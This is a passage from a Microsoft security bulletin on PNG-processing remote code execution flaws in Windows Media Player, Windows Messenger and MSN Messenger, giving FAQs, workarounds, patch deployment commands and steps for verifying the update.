Type\video/x-mpeg2a\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-asf-plugin\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-msvideo\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wm\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmp\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmv\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wmx\r\nHKEY_CLASSES_ROOT\MIME\Database\Content Type\video/x-ms-wvx\r\n\r\nImpact of Workaround:\r\n\r\n\u2022 These MIME type registry keys all have a CLSID value which points to the following CLSID:\r\nHKEY_CLASSES_ROOT\CLSID\{CD3AFA8F-B84F-48F0-9393-7EDC34128127}\InprocServer32\r\nThis CLSID is associated with WMP.DLL, which is responsible for launching Windows Media Player when these MIME types are used. Un-registering WMP.DLL will break Windows Media Player.\r\n \r\n\u2022 The MIME types listed in this workaround are specific to Windows XP. There may be additional MIME types available on other platforms.\r\n \r\n\r\nAdditional information about Windows Media Player File Name Extensions is available at the following MSDN Web site.\r\n\r\nTop of section\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Media Player - CAN-2004-1244: \r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Media Player does not completely validate PNG image files that carry excessive width or height values.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. 
Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could host a malformed PNG file on a Web site or network share, or persuade a user to open a PNG file sent as an e-mail attachment, could seek to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by hosting a specially crafted PNG file on a Web site or network share and enticing a user to visit that Web site. Additionally, an attacker could send a link to a malicious PNG file in an e-mail message and entice a user to click on the link.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nWindows 98 is not critically affected by this vulnerability; however, Windows 98 Second Edition and Windows Millennium Edition are. 
A Critical security update for these platforms is available and is provided as part of this security bulletin and can be downloaded from the Windows Update Web site.\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by modifying the way that Windows Media Player validates the width and height of a PNG file.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nA similar vulnerability has been publicly released and assigned Common Vulnerabilities and Exposures number CAN-2004-0597.\r\n\r\nIs this vulnerability the same as the vulnerability described in CAN-2004-0597?\r\nNo. The trigger is similar (a PNG file with excessive width or height values), but Windows Media Player does not use or incorporate the affected libpng library. The flaw is in Windows Media Player's own PNG handling, which is why it carries the separate identifier CAN-2004-1244.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in Windows Messenger because it does not properly handle corrupt or malformed PNG files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\n\u2022 The nature of the vulnerability is different in Windows Messenger than in MSN Messenger or Windows Media Player. 
The vulnerability in Windows Messenger would be very complex to exploit; an attempt would require a large amount of effort and knowledge of an organization's internal network.\r\n \r\n\u2022 A user would have to be running Windows Messenger and have it configured to receive .NET Alerts.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597 : \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified below.\r\n\r\nTurn off the .NET Alerts feature in Windows Messenger.\r\n\r\n\u2022 Open Windows Messenger\r\n \r\n\u2022 Go to the Tools menu and select \u201cOptions\u201d\r\n \r\n\u2022 In the Options Dialog go to the \u201cPrivacy\u201d tab.\r\n \r\n\u2022 Check the option that says \u201cDon\u2019t download any tabs to my computer\u201d\r\n \r\n\r\nNote this setting will take effect the next time you sign into Windows Messenger.\r\n.Net Alerts are only available on Passport accounts that have signed up to receive them. Users who have never configured their account to receive these alerts will not have this setting available.\r\n\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in Windows Messenger - CAN-2004-0597: \r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nWindows Messenger incorporates the public libpng 1.2.5 library, which was recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. 
Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nThe vulnerability in Windows Messenger would be very complex to exploit and requires a large amount of effort and knowledge about the internal network of an organization to attempt to exploit this vulnerability. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server. Simply sending a malformed PNG image file to Windows Messenger does not exploit this vulnerability.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nNo. None of these vulnerabilities are critical in severity on Windows 98, on Windows 98 Second Edition, or on Windows Millennium Edition. For more information about severity ratings, visit the following Web site.\r\n\r\nCould the vulnerability be exploited over the Internet? \r\nNo. An attacker would either need the ability to spoof the .NET Messenger service, or would have to intercept and rewrite communications between the client and the server.\r\nSimply sending a malformed PNG to Windows Messenger does not exploit this vulnerability. Microsoft has provided information about how you can help protect your PC. End users can visit the Protect Your PC Web site. 
IT Professionals can visit the Security Guidance Center Web site.\r\n\r\nWhat does the update do?\r\nThe update addresses the vulnerability by updating the library used by Windows Messenger to one that completely validates the PNG image file that is being processed. Additionally, Windows Messenger will now validate that PNG image files are properly formatted.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerability and Exposure number CAN-2004-0597, CAN-2004-0598 and CAN-2004-0599.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\n PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nA remote code execution vulnerability exists in MSN Messenger because it does not properly handle corrupt or malformed PNG image files. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\n Mitigating Factors for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\n\u2022 MSN Messenger, by default, does not allow anonymous people to send you messages. An attacker would first need to entice you to add them to your contacts list.\r\n \r\n\r\nTop of section\r\n Workarounds for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. 
When a workaround reduces functionality, it is identified below.\r\n\r\n\u2022 Do not add addresses that you do not recognize or trust to your contacts list.\r\n \r\n\u2022 Review all of the contacts currently in your contact list and remove or block any that you do not know, do not trust or no longer need.\r\n \r\n\u2022 Disable display picture in MSN Messenger using the following steps:\r\n\r\nClick Tools. Click Options. Click the Personal Tab\r\n\r\nClear the check box \u2018Show Display Picture from Others in Instant Message Conversations\u2019.\r\n \r\n\u2022 Disable Emoticons using the following steps:\r\n\r\nClick Tools. Click Options. Click the Messages Tab\r\n\r\nClear the check box \u2018Show emoticons in instant messages\u2019\r\n\r\nClear the check box \u2018Show custom emoticons in instant message\u2019.\r\n \r\n\u2022 Do not agree to accept file transfers from contacts you do not know or trust.\r\n \r\n\r\nTop of section\r\n FAQ for PNG Processing Vulnerability in MSN Messenger - CAN-2004-0597: \r\n\r\nIs the MSN Messenger 7.0 beta affected by this vulnerability?\r\nNo. This vulnerability was reported prior to the release of the MSN Messenger 7.0 beta, and the fix is therefore already incorporated into that product version.\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nWhat causes the vulnerability?\r\nMSN Messenger incorporates the public libpng 1.2.5 library, which was recently found to have several known vulnerabilities.\r\n\r\nWhat is PNG?\r\nPNG stands for Portable Network Graphics. The Portable Network Graphics (PNG) format was designed to replace the older and simpler GIF format and, to some extent, the much more complex TIFF format. 
Additional information about PNG can be found at the following Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAn attacker would likely seek to exploit this vulnerability by convincing a user to add them to their contacts list, and then sending a specially crafted emoticon or display picture.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nWorkstations and terminal servers are primarily at risk. Servers could be at more risk if users who do not have sufficient administrative credentials are given the ability to log on to servers and run programs. However, best practices strongly discourage allowing this.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nYes. Customers running an affected version of MSN Messenger should install the updated version of MSN Messenger.\r\n\r\nWhat does the update do?\r\nThe update removes the vulnerability by updating the library used by MSN Messenger to one that correctly validates the PNG file being passed to it.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nThese vulnerabilities have been publicly released and assigned Common Vulnerabilities and Exposures number CAN-2004-0597.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nNo. 
Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nTop of section\r\nTop of section\r\nTop of section\r\n Security Update Information \r\n\r\nInstallation Platforms and Prerequisites:\r\n\r\nFor information about the specific security update for your platform, click the appropriate link:\r\n\r\n Microsoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003 \r\n\r\nPrerequisites\r\nThis security update requires Windows Media Player 9 on Windows 2000 Service Pack 3 (SP3) or Service Pack 4 (SP4) or Windows XP Service Pack 1 (SP1) or Windows Server 2003.\r\n\r\nThe software that is listed has been tested to determine if the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support lifecycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nFor more information about how to obtain the latest service pack, see Microsoft Knowledge Base Article 260910.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other 
programs to close when the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows Media Player 9 Series on Windows 2000:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows Media Player 9 Series on Windows XP and Windows Server 2003:\r\n\r\nWindowsMediaPlayer9-KB885492-x86-enu /norestart\r\n\r\nFor information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB885492$\Spuninst folder. 
The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nFile Name Version Date Time Size \r\nWmp.dll\r\n 9.0.0.3250\r\n 04-Aug-2004\r\n 07:56\r\n 4,874,240\r\n \r\n\r\nNote When you install this security update on Windows Server 2003, the installer checks to see if any of the files that are being updated on your system have previously been updated by a Microsoft hotfix. If you have previously installed a hotfix to update an affected file, the installer copies the RTMQFE files to your system. 
Otherwise, the installer copies the RTMGDR files to your system.\r\n\r\nFor more information about this behavior, see Microsoft Knowledge Base Article 824994.\r\n\r\nFor more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nFor more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.\r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. 
Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry key.\r\n\r\nMicrosoft Windows Media Player 9 Series on Windows 2000, Windows XP and Windows Server 2003:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Media Player\wm885492\r\n\r\nNote This registry key may not contain a complete list of installed files. Also, this registry key may not be created correctly if an administrator or an OEM integrates or slipstreams the 885492 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.2009 on Windows XP Service Pack 1 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows Messenger version 4.7.0.2009 (when running on Windows XP Service Pack 1)\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /Q Specifies quiet mode, or suppresses prompts, when files are being extracted.\r\n\r\n /Q:U Specifies user-quiet mode, which presents some dialog boxes to the user.\r\n\r\n /Q:A Specifies administrator-quiet mode, which does not present any dialog boxes to the user.\r\n\r\n /T: <full path> Specifies the target folder for extracting files.\r\n\r\n /C Extracts the files without installing them. If /T: path is not specified, you are prompted for a target folder.\r\n\r\n /C: <Cmd> Override Install Command defined by author. 
Specifies the path and name of the setup .inf or .exe file.\r\n\r\n /R:N Never restarts the computer after installation.\r\n\r\n /R:I Prompts the user to restart the computer if a restart is required, except when used with /Q:A.\r\n\r\n /R:A Always restarts the computer after installation.\r\n\r\n /R:S Restarts the computer after installation without prompting the user.\r\n\r\nNote These switches do not necessarily work with all updates. If a switch is not available, that functionality is necessary for the correct installation of the update. Also, the use of the /N:V switch is unsupported and may result in an unbootable system. If the installation is unsuccessful, you should consult your support professional to understand why it failed to install.\r\n\r\nFor additional information about the supported setup switches, see Microsoft Knowledge Base Article 197147.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, and not force the system to restart, use the following command at a command prompt for Windows 2000 Service Pack 3, Windows 2000 Service Pack 4, Windows XP Service Pack 1, or Windows Server 2003:\r\n\r\nWindowsMessenger-KB887472-PreXPSP2-ENU /q:a /r:n\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. 
To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.2009 on Windows XP Service Pack 1:\r\n\r\nFile Name Version Date Time Size \r\nMsmsgs.exe\r\n 4.7.0.2010\r\n 16-Nov-2004\r\n 00:18\r\n 1,670,144\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. 
Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by confirming that an IsInstalled DWORD value with a data value of 1 exists in the following registry key:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}\r\n\r\nNote These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 4.7.0.3000 on Windows XP Service Pack 2 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows Messenger 4.7.0.3000 (when running on Windows XP Service Pack 2)\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\n /uninstall Uninstalls the package\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /l Lists installed Windows hotfixes or update packages\r\n\r\n /o Overwrite OEM files without prompting\r\n\r\n /n Do not backup files needed for uninstall\r\n\r\n /f Force other programs to close when 
the computer shuts down\r\n\r\n /integrate:path Integrates the update into the Windows source files located at the path specified\r\n\r\n /extract Extracts files without starting setup\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the previous version of the setup utility uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /passive /quiet\r\n\r\nTo install the security update without forcing the system to restart, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsXP-KB887472-x86-enu /norestart\r\n\r\nFor more information about how to deploy this security update with Software Update Services, visit the Software Update Services Web site.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFor Windows XP Service Pack 2: System administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe is located in the %Windir%\$NTUninstallKB887472$\Spuninst folder. 
The Spuninst.exe utility supports the following setup switches:\r\n\r\n /help Displays the command line options\r\n\r\nSetup Modes\r\n\r\n /quiet Quiet mode (no user interaction or display)\r\n\r\n /passive Unattended mode (progress bar only)\r\n\r\nRestart Options \r\n\r\n /norestart Do not restart when installation is complete\r\n\r\n /forcerestart Restart after installation\r\n\r\nSpecial Options \r\n\r\n /f Force other programs to close when the computer shuts down\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger version 4.7.0.3000 on Windows XP Service Pack 2:\r\n\r\nFile Name Version Date Time Size Folder \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:24\r\n 1,694,208\r\n SP2GDR\r\n \r\nMsmsgs.exe\r\n 4.7.0.3001\r\n 13-Oct-2004\r\n 16:21\r\n 1,694,208\r\n SP2QFE\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. 
If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n \r\n5.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n\r\nNote Attributes other than file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n \r\n\u2022 Registry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP3\KB887472\Filelist\r\n\r\nNote These registry keys may not contain a complete list of installed files. 
Also, these registry keys may not be created correctly if an administrator or an OEM integrates or slipstreams the 887472 security update into the Windows installation source files.\r\n \r\n\r\nTop of section\r\n\r\n Microsoft Windows Messenger 5.0 \r\n\r\nPrerequisites\r\nThis security update requires Microsoft Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, or Windows XP Service Pack 2.\r\n\r\nInstallation Information\r\n\r\nThis security update is packaged using Windows Installer Version 3.0. For more information, see the product documentation.\r\n\r\nRestart Requirement\r\n\r\nIn some cases, this update does not require a restart. The installer stops the required services, applies the update, and then restarts the services. However, if the required services cannot be stopped for any reason, or if required files are in use, this update will require a restart. If this occurs, a message appears that advises you to restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this security update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nFile Information\r\n\r\nThe English version of this update has the file attributes (or later) that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. 
To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.\r\n\r\nWindows Messenger 5.0 on Windows 2000 Service Pack 4, Windows Server 2003, Windows XP Service Pack 1, Windows XP Service Pack 2, or Windows XP Tablet PC Edition:\r\n\r\nFile Name Version Date Time Size \r\nmsmsgs.exe\r\n 5.1\r\n 05-Aug-2003\r\n 17:29\r\n 1,578,160\r\n \r\n\r\nVerifying Update Installation \r\n\r\n\u2022 Microsoft Baseline Security Analyzer\r\n\r\nTo verify that a security update is installed on an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. This tool allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n \r\n\u2022 File Version Verification\r\n\r\nNote Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.\r\n\r\n1.\r\n Click Start, and then click Search.\r\n \r\n2.\r\n In the Search Results pane, click All files and folders under Search Companion.\r\n \r\n3.\r\n In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.\r\n \r\n4.\r\n In the list of files, right-click a file name from the appropriate file information table, and then click Properties.\r\n \r\n\r\nNote Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.\r\n\r\n1.\r\n On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table.\r\n \r\n\r\nNote Attributes other than file version may change during installation. 
Comparing other file attributes to the information in the file information table is not a supported method of verifying the update installation. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.\r\n \r\n\r\nTop of section\r\n\r\n MSN Messenger 6.1 or 6.2 \r\n\r\nPrerequisites\r\n\r\nThis security update requires MSN Messenger 6.1 or 6.2.\r\n\r\nRestart Requirement\r\n\r\nThis update may require you to restart your computer.\r\n\r\nRemoval Information\r\n\r\nThis update cannot be uninstalled.\r\n\r\nVerifying Update Installation\r\n\r\nTo verify that a security update is installed on an affected system, please perform the following steps:\r\n\r\n1.\r\n Within MSN Messenger, Click Help, then About.\r\n \r\n2.\r\n Check the version number.\r\n \r\n\r\nIf the Version number reads 6.2.205 or above the update has been successfully installed.\r\n\r\nTop of section\r\nTop of section\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\r\n\u2022 Carlos Sarraute of Core Security Technologies for reporting the MSN Messenger PNG Processing Vulnerability (CAN-2004-0597).\r\n \r\n\r\nObtaining Other Security Updates:\r\n\r\nUpdates for other security issues are available from the following locations:\r\n\r\n\u2022 Security updates are available from the Microsoft Download Center. You can find them most easily by doing a keyword search for "security_patch."\r\n \r\n\u2022 Updates for consumer platforms are available from the Windows Update Web site.\r\n \r\n\r\nSupport: \r\n\r\n\u2022 Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n \r\n\u2022 International customers can receive support from their local Microsoft subsidiaries. 
